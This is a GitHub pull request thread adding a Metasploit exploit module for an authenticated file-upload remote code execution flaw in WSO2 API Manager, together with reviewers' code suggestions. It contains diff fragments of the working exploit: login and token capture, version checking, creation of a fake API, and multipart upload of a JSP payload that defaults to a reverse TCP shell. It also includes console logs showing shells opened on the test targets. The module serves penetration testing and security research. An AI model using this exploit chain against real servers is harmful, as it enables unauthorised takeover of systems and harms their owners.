### PR TITLE
Added module for WSO2 API Manager Documentation File Upload Remote Co…

### LINKED ISSUE #19646: Create module for WSO2 WSO2 API Manager Documentation File Upload Remote Code Execution
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2988/
- https://github.com/redwaysecurity/CVEs/tree/main/WSO2-2023-2988
- https://blog.redwaysecurity.com/2024/11/wso2-4.2.0-remote-code-execution.html

### PR DESCRIPTION
**Pull request by heyder**
## Vulnerable Application

Closes #19646 

A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions
(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled
server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.

```yaml
services:
  api-manager:
    image: wso2/wso2am:4.0.0-alpine
    container_name: swo2_api_manager
    ports:
      - "9443:9443"

```

```bash
docker-compose up
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use multi/http/wso2_api_manager_file_upload_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

### WSO2 API Manager 4.0.0
```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Authentication successful
[*] Listing APIs...
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... 
[+] Payload executed successfully
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100

id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
pwd
/home/wso2carbon/wso2am-4.0.0
exit
[*] 127.0.0.1 - Command shell session 2 closed.
```

#### Manually setting up the wrong API version

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target...
[+] Authentication successful
[-] Mismatch between version found (4.0.0) and module target version (WSO2 API Manager (4.2.0))
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[*] Listing products APIs...
[-] Exploit aborted due to failure: unexpected-reply: Failed to list APIs
[*] Exploit completed, but no session was created.
```

### CODE REVIEW

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 1]
```diff
@@ -0,0 +1,416 @@
...
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Checking target...')
+
+    authenticate
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/services', '/Version'),
```
Comment (jvoisin) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:92]:
```suggestion
      'uri' => normalize_uri(target_uri.path, 'services', 'Version'),
```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 2]
```diff
@@ -0,0 +1,416 @@
...
+    version = Rex::Version.new ::Regexp.last_match(1)
+
+    return CheckCode::Safe('Unable to determine version') unless version
+
+    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless
+       version <= Rex::Version.new('4.2.0') ||
+       version <= Rex::Version.new('4.1.0') ||
+       version <= Rex::Version.new('4.0.0') ||
+       version <= Rex::Version.new('3.2.0') ||
+       version <= Rex::Version.new('3.1.0')
```
Comment (jvoisin) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:112]: I don't think this is working, as it'll return `CheckCode::Safe` for any version above 4.2.0. You migjt want to use `version.between?(…)` instead.

File: documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md [hunk 3]
```diff
@@ -0,0 +1,77 @@
...
+uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
+pwd
+/home/wso2carbon/wso2am-4.0.0
+exit
+[*] 127.0.0.1 - Command shell session 2 closed.
+```
+
+## Options
+
+### USERNAME (required)
```
Comment (sjanusz-r7) [inline documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md:63]: Should this be `HttpUsername` based on this in the module: `OptString.new('HttpUsername', [true, 'WSO2 API manager username', 'admin']),`

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 4]
```diff
@@ -0,0 +1,409 @@
...
+    return CheckCode::Unknown unless res&.code == 200 && res&.headers&.[]('Server') =~ /WSO2/
+
+    xml = res.get_xml_document
+    xml.at_xpath('//return').text.match(/WSO2 API Manager-((?:\d\.){2}(?:\d))$/)
+    version = Rex::Version.new ::Regexp.last_match(1)
+
+    return CheckCode::Unknown('Unable to determine version') unless version
+
+    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless version.between?(
+      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.0')
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:108]:
```suggestion
      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.9')
```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 5]
```diff
@@ -0,0 +1,409 @@
...
+      end
+
+      return CheckCode::Unknown('Unable to automatically select a target. You might need to set the target manually') unless selected_target_index
+
+      # Set the target
+      datastore['TARGET'] = selected_target_index
+      vprint_status("Automatically selected target: #{target.name} for version #{version}")
+    else
+      print_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
+        Rex::Version.new(target.opts['min_version']), Rex::Version.new(target.opts['max_version'])
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:128]: Is the version check here meant to be inclusive or not? Is the `max_version` here still vulnerable or when the vulnerability has been patched?

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 6]
```diff
@@ -0,0 +1,409 @@
...
+        end
+      end
+
+      return CheckCode::Unknown('Unable to automatically select a target. You might need to set the target manually') unless selected_target_index
+
+      # Set the target
+      datastore['TARGET'] = selected_target_index
+      vprint_status("Automatically selected target: #{target.name} for version #{version}")
+    else
+      print_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:127]:
```suggestion
      vprint_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 7]
```diff
@@ -0,0 +1,409 @@
...
+        Rex::Version.new(target.opts['min_version']), Rex::Version.new(target.opts['max_version'])
+      )
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:129]: Should we return a CheckCode::Safe here if the version mismatch happens?
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 8]
```diff
@@ -0,0 +1,409 @@
...
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to list APIs') unless res&.code == 200
+
+    api_list = res.get_json_document['list']
+
+    if api_list.empty?
+      print_error('No Proucts API available')
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:231]:
```suggestion
      print_error('No Products API available')
```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 9]
```diff
@@ -0,0 +1,409 @@
...
+      'businessInformation' => {
+        'businessOwner' => Faker::Name.name,
+        'businessOwnerEmail' => Faker::Internet.email,
+        'technicalOwner' => Faker::Name.name,
+        'technicalOwnerEmail' => Faker::Internet.email
+      },
+      'endpointConfig' => {
+        'endpoint_type' => 'http',
+        'sandbox_endpoints' => {
+          'url' => "https://#{target_uri.host}:9443/am/#{Faker::Internet.slug}/v1/api/"
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:259]: Should this use the RPORT datastore option?
```suggestion
          'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 10]
```diff
@@ -0,0 +1,409 @@
...
+          [ 'URL', 'https://github.com/redwaysecurity/CVEs/tree/main/WSO2-2023-2988' ], # PoC
+          [ 'URL', 'https://blog.redwaysecurity.com/2024/11/wso2-4.2.0-remote-code-execution.html' ], # Writeup
+          [ 'URL', 'https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2988/' ]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'java/jsp_shell_reverse_tcp',
+          'SSL' => true,
+          'RPORT' => 9443
+        },
+        'Platform' => %w[linux],
```
Comment (sjanusz-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:40]: Would this also support `windows`?
The module is currently an `exploit/multi`, but only specifies `linux` as a valid platform.

File: documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md [hunk 11]
```diff
@@ -0,0 +1,77 @@
...
+      - "9443:9443"
+
+```
+
+```bash
+docker-compose up
+```
+
+
+
```
Comment (jheysel-r7) [inline documentation/modules/exploit/multi/http/wso2_api_manager_file_upload_rce.md:22]: There seems to be some extra spacing here.
```suggestion

```

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 12]
```diff
@@ -0,0 +1,408 @@
...
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      },
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+    fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed') unless res&.code == 201
+
+    print_good('Payload uploaded successfully')
```
Comment (jheysel-r7) [inline modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:370]:
```suggestion
    print_good('Payload uploaded successfully')
    register_file_for_cleanup(jsp_filename)
```

**Review by jheysel-r7 — CHANGES_REQUESTED** [review]
Thanks for the module @heyder! It's looking good. I've got a couple suggestions. I wasn't able test it successfully the first time around. Please let me know if I've made a mistake with my testing attempt, I've included some logs below.

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 13]
```diff
@@ -0,0 +1,408 @@
...
+        'technicalOwnerEmail' => Faker::Internet.email
+      },
+      'endpointConfig' => {
+        'endpoint_type' => 'http',
+        'sandbox_endpoints' => {
+          'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
+        },
+        'production_endpoints' => {
+          'url' => "https://#{target_uri.host}:#{datastore['RPORT']}/am/#{Faker::Internet.slug}/v1/api/"
+        }
```
[the remark this answers is not in the document]
Comment (heyder) [reply modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:267]: Sure, we could do it, but it doesn't really matter. It is just a fake API, which we'll use to add documentation to it.

File: modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb [hunk 14]
```diff
@@ -0,0 +1,408 @@
...
+      )
+      if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
+        self.bearer = ::Regexp.last_match(1)
+      end
+      break if bearer
+
+      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    end
+
+    fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer
```
[the remark this answers is not in the document]
Comment (heyder) [reply modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:210]: @jheysel-r7 Thanks for the thorough troubleshooting and insights.

I pinpointed the issue: the application replays on a redirect with a full location URL, and it seems that `send_request_cgi` doesn't automatically account for this scenario.

As a takeaway, I'll remind myself to test directly without using a proxy first—Burp was handling that seamlessly, which masked the underlying problem during my tests.

Here’s the difference between the first and second requests that led me to this conclusion:

**First request:**

`GET /publisher/services/auth/login HTTP/1.1`


**Second request:**

`GET https://localhost:9443/oauth2/authorize?response_type=code&.... HTTP/1.1`



I’ve come up with a quick and dirty solution to address this issue, though I’m unsure if it meets the code quality standards. I’d love to hear any other ideas you might have!

[the remark this answers is not in the document]
Comment (jheysel-r7) [reply modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb:190]: @heyder Thanks for implementing the fix and explaining what was going on. 

So `send_request_cgi` isn't designed to follow redirects when they occur but `send_request_cgi!` is and you can specify the redirect depth as needed. 

In this method the first redirect loop, loops once and the second one loops twice. So we should be able to replace the respective loops with:
```
res = send_request_cgi!(opts, 20, 1) # timeout and redirect_depth
res = send_request_cgi!(opts, 20, 2) # timeout and redirect_depth
```

However I ran into an issue while testing and I _think_  it's a bug in the `http_client.rb`. I've outlined it here:
https://github.com/rapid7/metasploit-framework/pull/19700.

I'll push my changes up so you can see what I've done. We can revert my change if need be.

**Review by jheysel-r7 — APPROVED** [review]
Thanks for the update @heyder. I've retested with the bug fix that's recently been landed and everything is good to go. https://github.com/rapid7/metasploit-framework/pull/19700 🚀 

```
msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Authentication successful
[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable.
[+] Document created successfully
[*] Uploading payload...
[+] Payload uploaded successfully. File: YJ8y3ntidni5FjXb.jsp
[*] Executing payload...
[+] Payload executed successfully
[+] Deleted repository/deployment/server/webapps/authenticationendpoint/YJ8y3ntidni5FjXb.jsp
[*] Command shell session 1 opened (172.16.199.158:4444 -> 172.23.0.2:35776) at 2024-12-12 09:55:58 -0900

uname -a
Linux d8d7997d1a5a 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64 Linux
id
uid=802(wso2carbon) gid=802(wso2) groups=802(wso2)
```

**Comment by jheysel-r7** [comment]
# Release Notes
Adds an exploit module for a vulnerability in the 'Add API Documentation' feature of WSO2 API Manager and allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.

**Pull request merged**